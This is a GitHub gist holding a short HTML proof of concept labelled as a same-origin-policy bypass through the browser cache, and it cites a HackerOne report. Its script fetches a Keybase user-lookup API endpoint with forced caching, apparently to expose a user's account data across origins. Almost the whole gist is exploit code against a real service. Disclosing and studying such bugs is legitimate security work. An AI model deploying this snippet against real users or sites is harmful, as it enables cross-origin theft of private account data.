Skip to content

Instantly share code, notes, and snippets.

@streghstreek
Created April 19, 2021 16:13
Show Gist options
  • Save streghstreek/1f95e83b534f3e576edd5a0b40b12c35 to your computer and use it in GitHub Desktop.
Save streghstreek/1f95e83b534f3e576edd5a0b40b12c35 to your computer and use it in GitHub Desktop.
SOP bypass using browser cache (https://hackerone.com/reports/761726)
<html>
<script>
var url = "https://keybase.io/_/api/1.0/user/lookup.json?username={YOUR_USERNAME}";
fetch(url, {
method: 'GET',
cache: 'force-cache'
});
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment